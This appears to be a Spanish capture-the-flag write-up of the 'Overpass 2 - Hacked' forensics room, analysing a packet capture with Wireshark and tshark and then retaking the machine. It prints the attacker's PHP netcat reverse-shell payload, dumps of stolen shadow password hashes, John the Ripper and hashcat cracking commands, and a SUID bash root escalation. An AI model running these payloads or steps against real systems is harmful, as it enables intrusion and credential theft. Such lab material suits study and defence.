🧑‍🔬OVERPASS 2 - HACKEADO

1. Análisis forense:

• Se abre Wireshark y se carga el archivo de captura (overpass2.pcapng).

• Se filtran los paquetes por protocolo HTTP.

• Se busca la ruta "/development/upload.php".

• Se analiza la carga útil del archivo payload.php para ver cómo se ejecutó el comando del shell inverso.

• Tambien filtarmos con busqueda de filtros con TSHARK:

tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"

tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings

Carga útil del archivo payload.php:

PHP

<?php
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f");
?>

2. Escalada de privilegios:

• Se busca en la captura de Wireshark el comando "sudo".

• Se observa la contraseña "siemprequenoteartinstant" utilizada por el atacante para ejecutar el comando con privilegios de superusuario.

su james

3. Persistencia:

• Se busca en la captura de Wireshark el comando "git clone".

• Se observa que el atacante clonó el repositorio de GitHub "https://github.com/NinjaJc01/ssh-backdoor".

4. Obtención de acceso:

• Se descifran 4 contraseñas de 5 usarios que el atacante vio en /etc/shadow , y usamos John the Ripper y una lista de palabras.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt

• Se descifra el hash de la puerta trasera SSH utilizando hashcat, pero primero guardamos el Hash que uso el atacante al ejecutar ssh Backdoor mas el salt que contiene el script este, en el archivo se gurada asi: hash:salt.

┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:1c362db832f3f864c8c2fe05f2002a05

• Se utiliza ssh para conectarse al sistema con la cuenta de "James" y la contraseña "november16".

Comando para descifrar el hash de la puerta trasera SSH:

hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt

5. Elevación de privilegios:

• Se ejecuta el archivo ".suid_bash" con la bandera "-p" para obtener privilegios de root, este parametro lo encontramos en las opciones del script suid_bash poniendo un -j o -h erroneo nos dio las opciones de parametro que tenia, y el -p decia que dejaba acceder al script con bit suid de ROOt a todas las rutas del $PATH por ende podriamos ejcutar ya asi cualquier comando como ROOT y se tenzo.

Comando para obtener privilegios de root:

./.suid_bash -p

Resultado:

• Se recupera el control del sistema y se obtiene la bandera del usuario y ROOT.

// Some code

PENTESTING OFENSIVO:



Paso elevado 2 - Hackeado : 




DESCARGAMOS EL ARCHIVO .PCAP DONDE SE CAPTURO ANALISANDO LA RED DURANTE EL ATAQUE QUE RESIVIMOS, Y LUEGO VERIFICAMOS LA INTEGRIDAD DEL ARCHIVO CON MD5SUM Y PERFECTO:


┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# md5sum overpass2.pcapng 
11c3b2e9221865580295bc662c35c6dc  overpass2.pcapng




---------------------------   WIRESHARK     ------------------------------




ANALIZANDO EL ARCHIVO RASANTEMNTE VEMOS YA ESTA INFORMACION RAPIDAMENTE, COMO QUE SE SOLICITO UNA SUBIDA DE ARCHIVO DESDE LA (atacante)IP : 192.168.170.145 A NUESTRO SERVIDOR (victima)IP: 192.168.170.159 CON UNA SOLITUD CON METODO GET A LA RUTA /development/uploads/payload.php :



PAQUETE DE PAYLOAD:



Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159

Transmission Control Protocol, Src Port: 47736, Dst Port: 80, Seq: 1, Ack: 1, Len: 400

Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

http://192.168.170.159/development/uploads/payload.php      


 
0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   01 c4 51 81 40 00 40 06 11 31 c0 a8 aa 91 c0 a8   ..Q.@.@..1......
0020   aa 9f ba 78 00 50 e0 79 05 4f c6 62 99 6d 80 18   ...x.P.y.O.b.m..
0030   01 f6 59 5e 00 00 01 01 08 0a c2 13 f6 dc 35 50   ..Y^..........5P
0040   7d 77 47 45 54 20 2f 64 65 76 65 6c 6f 70 6d 65   }wGET /developme
0050   6e 74 2f 75 70 6c 6f 61 64 73 2f 70 61 79 6c 6f   nt/uploads/paylo
0060   61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d   ad.php HTTP/1.1.
0070   0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31   .Host: 192.168.1
0080   37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65   70.159..User-Age
0090   6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20   nt: Mozilla/5.0 
00a0   28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f   (X11; Linux x86_
00b0   36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63   64; rv:68.0) Gec
00c0   6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65   ko/20100101 Fire
00d0   66 6f 78 2f 36 38 2e 30 0d 0a 41 63 63 65 70 74   fox/68.0..Accept
00e0   3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c   : text/html,appl
00f0   69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d   ication/xhtml+xm
0100   6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d   l,application/xm
0110   6c 3b 71 3d 30 2e 39 2c 2a 2f 2a 3b 71 3d 30 2e   l;q=0.9,*/*;q=0.
0120   38 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61   8..Accept-Langua
0130   67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30   ge: en-US,en;q=0
0140   2e 35 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64   .5..Accept-Encod
0150   69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61   ing: gzip, defla
0160   74 65 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74   te..Referer: htt
0170   70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 37 30 2e   p://192.168.170.
0180   31 35 39 2f 64 65 76 65 6c 6f 70 6d 65 6e 74 2f   159/development/
0190   75 70 6c 6f 61 64 73 2f 0d 0a 43 6f 6e 6e 65 63   uploads/..Connec
01a0   74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65   tion: keep-alive
01b0   0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75   ..Upgrade-Insecu
01c0   72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a   re-Requests: 1..
01d0   0d 0a                                             ..







PAQUETE DE TRANSMISICION DE LA REVERSE SHELL, VEMOS QUE SOLICITO Y LE MANDAMOS EL CAT de /ETC/PASSWD Y TAMBIEN DETECTAMOS YA QUE SU REVERSE SHELL ESTA LISTANDO POR EL PUERTO 4242 De LA IP ATACANTE, y SALEN LAS RESPUESTAS DE NUESTRO PUERTO 57680:



Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145

Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 1543, Ack: 171, Len: 1462


0000   00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00   ..)..H..)n....E.
0010   05 ea ae bd 40 00 40 06 af ce c0 a8 aa 9f c0 a8   ....@.@.........
0020   aa 91 e1 50 10 92 09 61 b5 64 67 a7 d5 31 80 18   ...P...a.dg..1..
0030   01 f6 dc 5e 00 00 01 01 08 0a 35 51 84 97 c2 14   ...^......5Q....
0040   fd f8 72 6f 6f 74 3a 2a 3a 31 38 32 39 35 3a 30   ..root:*:18295:0
0050   3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 64 61 65   :99999:7:::..dae
0060   6d 6f 6e 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39   mon:*:18295:0:99
0070   39 39 39 3a 37 3a 3a 3a 0d 0a 62 69 6e 3a 2a 3a   999:7:::..bin:*:
0080   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
0090   3a 3a 0d 0a 73 79 73 3a 2a 3a 31 38 32 39 35 3a   ::..sys:*:18295:
00a0   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79   0:99999:7:::..sy
00b0   6e 63 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   nc:*:18295:0:999
00c0   39 39 3a 37 3a 3a 3a 0d 0a 67 61 6d 65 73 3a 2a   99:7:::..games:*
00d0   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
00e0   3a 3a 3a 0d 0a 6d 61 6e 3a 2a 3a 31 38 32 39 35   :::..man:*:18295
00f0   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 6c   :0:99999:7:::..l
0100   70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   p:*:18295:0:9999
0110   39 3a 37 3a 3a 3a 0d 0a 6d 61 69 6c 3a 2a 3a 31   9:7:::..mail:*:1
0120   38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a   8295:0:99999:7::
0130   3a 0d 0a 6e 65 77 73 3a 2a 3a 31 38 32 39 35 3a   :..news:*:18295:
0140   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75   0:99999:7:::..uu
0150   63 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   cp:*:18295:0:999
0160   39 39 3a 37 3a 3a 3a 0d 0a 70 72 6f 78 79 3a 2a   99:7:::..proxy:*
0170   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
0180   3a 3a 3a 0d 0a 77 77 77 2d 64 61 74 61 3a 2a 3a   :::..www-data:*:
0190   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
01a0   3a 3a 0d 0a 62 61 63 6b 75 70 3a 2a 3a 31 38 32   ::..backup:*:182
01b0   39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d   95:0:99999:7:::.
01c0   0a 6c 69 73 74 3a 2a 3a 31 38 32 39 35 3a 30 3a   .list:*:18295:0:
01d0   39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 69 72 63 3a   99999:7:::..irc:
01e0   2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a   *:18295:0:99999:
01f0   37 3a 3a 3a 0d 0a 67 6e 61 74 73 3a 2a 3a 31 38   7:::..gnats:*:18
0200   32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a   295:0:99999:7:::
0210   0d 0a 6e 6f 62 6f 64 79 3a 2a 3a 31 38 32 39 35   ..nobody:*:18295
0220   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73   :0:99999:7:::..s
0230   79 73 74 65 6d 64 2d 6e 65 74 77 6f 72 6b 3a 2a   ystemd-network:*
0240   3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37   :18295:0:99999:7
0250   3a 3a 3a 0d 0a 73 79 73 74 65 6d 64 2d 72 65 73   :::..systemd-res
0260   6f 6c 76 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39   olve:*:18295:0:9
0270   39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 73 6c 6f   9999:7:::..syslo
0280   67 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   g:*:18295:0:9999
0290   39 3a 37 3a 3a 3a 0d 0a 6d 65 73 73 61 67 65 62   9:7:::..messageb
02a0   75 73 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39   us:*:18295:0:999
02b0   39 39 3a 37 3a 3a 3a 0d 0a 5f 61 70 74 3a 2a 3a   99:7:::.._apt:*:
02c0   31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a   18295:0:99999:7:
02d0   3a 3a 0d 0a 6c 78 64 3a 2a 3a 31 38 32 39 35 3a   ::..lxd:*:18295:
02e0   30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75   0:99999:7:::..uu
02f0   69 64 64 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39   idd:*:18295:0:99
0300   39 39 39 3a 37 3a 3a 3a 0d 0a 64 6e 73 6d 61 73   999:7:::..dnsmas
0310   71 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   q:*:18295:0:9999
0320   39 3a 37 3a 3a 3a 0d 0a 6c 61 6e 64 73 63 61 70   9:7:::..landscap
0330   65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   e:*:18295:0:9999
0340   39 3a 37 3a 3a 3a 0d 0a 70 6f 6c 6c 69 6e 61 74   9:7:::..pollinat
0350   65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39   e:*:18295:0:9999
0360   39 3a 37 3a 3a 3a 0d 0a 73 73 68 64 3a 2a 3a 31   9:7:::..sshd:*:1
0370   38 34 36 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a   8464:0:99999:7::
0380   3a 0d 0a 6a 61 6d 65 73 3a 24 36 24 37 47 53 35   :..james:$6$7GS5
0390   65 2e 79 76 24 48 71 49 48 35 4d 74 68 70 47 57   e.yv$HqIH5MthpGW
03a0   70 63 7a 72 33 4d 6e 77 44 48 6c 45 44 38 67 62   pczr3MnwDHlED8gb
03b0   56 53 48 74 37 6d 61 38 79 78 7a 42 4d 38 4c 75   VSHt7ma8yxzBM8Lu
03c0   42 52 65 44 56 35 65 31 50 75 2f 56 75 52 73 6b   BReDV5e1Pu/VuRsk
03d0   75 67 74 31 43 6b 75 6c 2f 53 4b 47 58 2e 35 50   ugt1Ckul/SKGX.5P
03e0   79 4d 70 7a 41 59 6f 33 43 67 2f 3a 31 38 34 36   yMpzAYo3Cg/:1846
03f0   34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a   4:0:99999:7:::..
0400   70 61 72 61 64 6f 78 3a 24 36 24 6f 52 58 51 75   paradox:$6$oRXQu
0410   34 33 58 24 57 61 41 6a 33 5a 2f 34 73 45 50 56   43X$WaAj3Z/4sEPV
0420   31 6d 4a 64 48 73 79 4a 6b 49 5a 6d 31 72 6a 6a   1mJdHsyJkIZm1rjj
0430   6e 4e 78 72 59 35 63 38 47 45 6c 4a 49 6a 47 37   nNxrY5c8GElJIjG7
0440   75 33 36 78 53 67 4d 47 77 4b 41 32 77 6f 44 49   u36xSgMGwKA2woDI
0450   46 75 64 74 79 71 59 33 37 59 43 79 75 6b 69 48   FudtyqY37YCyukiH
0460   4a 50 68 69 34 49 55 37 48 30 3a 31 38 34 36 34   JPhi4IU7H0:18464
0470   3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73   :0:99999:7:::..s
0480   7a 79 6d 65 78 3a 24 36 24 42 2e 45 6e 75 58 69   zymex:$6$B.EnuXi
0490   4f 24 66 2f 75 30 30 48 6f 73 5a 49 4f 33 55 51   O$f/u00HosZIO3UQ
04a0   43 45 4a 70 6c 61 7a 6f 51 74 48 38 57 4a 6a 53   CEJplazoQtH8WJjS
04b0   58 2f 6f 6f 42 6a 77 6d 59 66 45 4f 54 63 71 43   X/ooBjwmYfEOTcqC
04c0   41 6c 4d 6a 65 46 49 67 59 57 71 52 35 41 6a 32   AlMjeFIgYWqR5Aj2
04d0   76 73 66 52 79 66 36 78 31 77 58 78 4b 69 74 63   vsfRyf6x1wXxKitc
04e0   50 55 6a 63 58 6c 58 2f 3a 31 38 34 36 34 3a 30   PUjcXlX/:18464:0
04f0   3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 62 65 65   :99999:7:::..bee
0500   3a 24 36 24 2e 53 71 48 72 70 36 7a 24 42 34 72   :$6$.SqHrp6z$B4r
0510   57 50 69 30 48 6b 6a 30 67 62 51 4d 46 75 6a 7a   WPi0Hkj0gbQMFujz
0520   31 4b 48 56 73 39 56 72 53 46 75 37 41 55 39 43   1KHVs9VrSFu7AU9C
0530   78 57 72 5a 56 37 47 7a 48 30 35 74 59 50 4c 31   xWrZV7GzH05tYPL1
0540   78 52 7a 55 4a 6c 46 48 62 79 70 30 4b 39 54 41   xRzUJlFHbyp0K9TA
0550   65 59 31 4d 36 6e 69 46 73 65 42 39 56 4c 42 57   eY1M6niFseB9VLBW
0560   53 6f 30 3a 31 38 34 36 34 3a 30 3a 39 39 39 39   So0:18464:0:9999
0570   39 3a 37 3a 3a 3a 0d 0a 6d 75 69 72 6c 61 6e 64   9:7:::..muirland
0580   3a 24 36 24 53 57 79 62 53 38 6f 32 24 39 64 69   :$6$SWybS8o2$9di
0590   76 65 51 69 6e 78 79 38 50 4a 51 6e 47 51 51 57   veQinxy8PJQnGQQW
05a0   62 54 4e 4b 65 62 32 41 69 53 70 2e 69 38 4b 7a   bTNKeb2AiSp.i8Kz
05b0   6e 75 41 6a 59 62 71 49 33 71 30 34 52 66 35 68   nuAjYbqI3q04Rf5h
05c0   6a 48 50 65 72 33 77 65 69 43 2e 32 4d 72 4f 6a   jHPer3weiC.2MrOj
05d0   32 6f 31 53 77 2f 66 64 32 63 75 30 6b 43 36 64   2o1Sw/fd2cu0kC6d
05e0   55 50 2e 3a 31 38 34 36 34 3a 30 3a 39 39 39 39   UP.:18464:0:9999
05f0   39 3a 37 3a 3a 3a 0d 0a                           9:7:::..






VEMOS TAMBIEN EL ENCABEZADO DE TERMINALl AL QUE SE CONECTO A NUESTRO SERVIDOR LA REVERSESHELL DEL ATACANTE Y VEMOS EL USUARIO DEL QUE TOMO DOMINIO JAMES DE LA MAQUINA EMPRSA OVERPASS:



Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145

Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 3005, Ack: 171, Len: 29




0000   00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00   ..)..H..)n....E.
0010   00 51 ae bf 40 00 40 06 b5 65 c0 a8 aa 9f c0 a8   .Q..@.@..e......
0020   aa 91 e1 50 10 92 09 61 bb 1a 67 a7 d5 31 80 18   ...P...a..g..1..
0030   01 f6 4f 91 00 00 01 01 08 0a 35 51 84 97 c2 14   ..O.......5Q....
0040   fd fc 6a 61 6d 65 73 40 6f 76 65 72 70 61 73 73   ..james@overpass
0050   2d 70 72 6f 64 75 63 74 69 6f 6e 3a 7e 24 20      -production:~$ 








VEMOS TAMBIEN QUE NOS SOLICITO CLONAR EN GITHUB UN REPOD E UN SSH-BACKDOORS EN NUESTRA MAQUINA VICTIMA (git clone https://github.com/NinjaJc01/ssh-backdoor):


Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159

Transmission Control Protocol, Src Port: 4242, Dst Port: 57680, Seq: 171, Ack: 3034, Len: 52



0000   00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010   00 68 77 75 40 00 40 06 ec 98 c0 a8 aa 91 c0 a8   .hwu@.@.........
0020   aa 9f 10 92 e1 50 67 a7 d5 31 09 61 bb 37 80 18   .....Pg..1.a.7..
0030   01 f5 2a 8b 00 00 01 01 08 0a c2 15 86 21 35 51   ..*..........!5Q
0040   84 97 67 69 74 20 63 6c 6f 6e 65 20 68 74 74 70   ..git clone http
0050   73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4e   s://github.com/N
0060   69 6e 6a 61 4a 63 30 31 2f 73 73 68 2d 62 61 63   injaJc01/ssh-bac
0070   6b 64 6f 6f 72 0a                                 kdoor.




------------------------------  TSHARK  -----------------------------



BIEN A GRANSES RASGOS YA VIMOS INFORMACION; PERO DEBEMOS ANALIZARLO MAS COMODO Y RAPIDO Y LO VAMOS A HACER CREO CON TSHARK FILTRANDO CON PIPELINE Y GREP:





LEEMOS EL ARCHIVO EN BRUTO:




┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng                  
Running as user "root" and group "root". This could be dangerous.
    1 0.000000000 192.168.170.145 → 192.168.170.159 TCP 74 47732 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256059711 TSecr=0 WS=128
    2 0.000122542 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47732 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894438874 TSecr=3256059711 WS=128
    3 0.000211854 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256059711 TSecr=894438874
    4 0.000326676 192.168.170.145 → 192.168.170.159 HTTP 484 GET /development/ HTTP/1.1 
    5 0.000342046 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [ACK] Seq=1 Ack=419 Win=64768 Len=0 TSval=894438874 TSecr=3256059711
    6 0.000860947 192.168.170.159 → 192.168.170.145 HTTP 1078 HTTP/1.1 200 OK  (text/html)
    7 0.000863357 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256059712 TSecr=894438875
    8 5.002042815 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [FIN, ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256064713 TSecr=894438875
    9 5.002197308 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [FIN, ACK] Seq=1013 Ack=420 Win=64768 Len=0 TSval=894443876 TSecr=3256064713
   10 5.002289760 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=420 Ack=1014 Win=64128 Len=0 TSval=3256064713 TSecr=894443876
   11 7.915625379 192.168.170.145 → 192.168.170.159 TCP 74 47734 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256067626 TSecr=0 WS=128
   12 7.915783662 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47734 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894446790 TSecr=3256067626 WS=128
   13 7.915903135 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256067627 TSecr=894446790
   14 7.915992166 192.168.170.145 → 192.168.170.159 HTTP 1026 POST /development/upload.php HTTP/1.1  (application/x-php)
   15 7.916108038 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [ACK] Seq=1 Ack=961 Win=64256 Len=0 TSval=894446790 TSecr=3256067627
   16 7.916964256 192.168.170.159 → 192.168.170.145 HTTP 309 HTTP/1.1 200 OK  (text/html)
   17 7.916975776 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=961 Ack=244 Win=64128 Len=0 TSval=3256067628 TSecr=894446791
   18 11.984825193 192.168.170.145 → 192.168.170.159 HTTP 401 GET /development/uploads/ HTTP/1.1 
   19 11.985407246 192.168.170.159 → 192.168.170.145 HTTP 788 HTTP/1.1 200 OK  (text/html)
   20 11.985492397 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256071696 TSecr=894450859
   21 16.986459371 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [FIN, ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256076697 TSecr=894450859
   22 16.986574454 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [FIN, ACK] Seq=966 Ack=1297 Win=64128 Len=0 TSval=894455860 TSecr=3256076697
   23 16.986655155 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1297 Ack=967 Win=64128 Len=0 TSval=3256076697 TSecr=894455860
   24 28.573920433 192.168.170.145 → 192.168.170.159 TCP 74 47736 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256088284 TSecr=0 WS=128
   25 28.574038675 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47736 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894467447 TSecr=3256088284 WS=128
   26 28.574114977 192.168.170.145 → 192.168.170.159 TCP 66 47736 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256088284 TSecr=894467447
   27 28.574178738 192.168.170.145 → 192.168.170.159 HTTP 466 GET /development/uploads/payload.php HTTP/1.1 
   28 28.574306231 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894467448 TSecr=3256088284
   29 28.577587788 192.168.170.159 → 192.168.170.145 TCP 74 57680 → 4242 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=894467451 TSecr=0 WS=128
   30 28.577592188 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=3256088288 TSecr=894467451 WS=128
   31 28.577678110 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=894467451 TSecr=3256088288
   32 28.577728691 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=1 Ack=1 Win=64256 Len=55 TSval=894467451 TSecr=3256088288
   33 28.577735721 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=1 Ack=56 Win=65152 Len=0 TSval=3256088288 TSecr=894467451
   34 38.757749641 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256098468 TSecr=894467448
   35 38.757894444 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894477631 TSecr=3256088284
   36 39.323816051 192.168.170.145 → 192.168.170.159 TCP 69 4242 → 57680 [PSH, ACK] Seq=1 Ack=56 Win=65152 Len=3 TSval=3256099034 TSecr=894467451
   37 39.323916393 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=56 Ack=4 Win=64256 Len=0 TSval=894478197 TSecr=3256099034
   38 39.325002015 192.168.170.159 → 192.168.170.145 TCP 120 57680 → 4242 [PSH, ACK] Seq=56 Ack=4 Win=64256 Len=54 TSval=894478198 TSecr=3256099034
   39 39.325065907 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=110 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
   40 39.325194169 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=110 Ack=4 Win=64256 Len=2 TSval=894478198 TSecr=3256099035
   41 39.325239331 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=112 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
   42 40.710537987 192.168.170.138 → 192.168.170.254 DHCP 338 DHCP Request  - Transaction ID 0xdf5ef3a7
   43 40.710799752 192.168.170.254 → 192.168.170.138 DHCP 342 DHCP ACK      - Transaction ID 0xdf5ef3a7
   44 44.659136740 192.168.170.145 → 192.168.170.159 TCP 113 4242 → 57680 [PSH, ACK] Seq=4 Ack=112 Win=65152 Len=47 TSval=3256104369 TSecr=894478198
   45 44.677577863 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=112 Ack=51 Win=64256 Len=64 TSval=894483551 TSecr=3256104369
   46 44.677585633 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=51 Ack=176 Win=65152 Len=0 TSval=3256104388 TSecr=894483551
   47 45.883299798 VMware_82:6c:a5 → VMware_e5:1f:cc ARP 42 Who has 192.168.170.254? Tell 192.168.170.138
   48 45.883412361 VMware_e5:1f:cc → VMware_82:6c:a5 ARP 60 192.168.170.254 is at 00:50:56:e5:1f:cc
   49 48.593184369 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=51 Ack=176 Win=65152 Len=8 TSval=3256108303 TSecr=894483551
   50 48.593672339 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=176 Ack=59 Win=64256 Len=9 TSval=894487467 TSecr=3256108303
   51 48.593744170 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=185 Win=65152 Len=0 TSval=3256108304 TSecr=894487467
   52 48.594671419 192.168.170.159 → 192.168.170.145 TCP 78 57680 → 4242 [PSH, ACK] Seq=185 Ack=59 Win=64256 Len=12 TSval=894487468 TSecr=3256108304
   53 48.594685199 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=197 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
   54 48.594748890 192.168.170.159 → 192.168.170.145 TCP 184 57680 → 4242 [PSH, ACK] Seq=197 Ack=59 Win=64256 Len=118 TSval=894487468 TSecr=3256108305
   55 48.594807082 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=315 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
   56 48.595037346 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=315 Ack=59 Win=64256 Len=64 TSval=894487468 TSecr=3256108305
   57 48.595043106 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=379 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
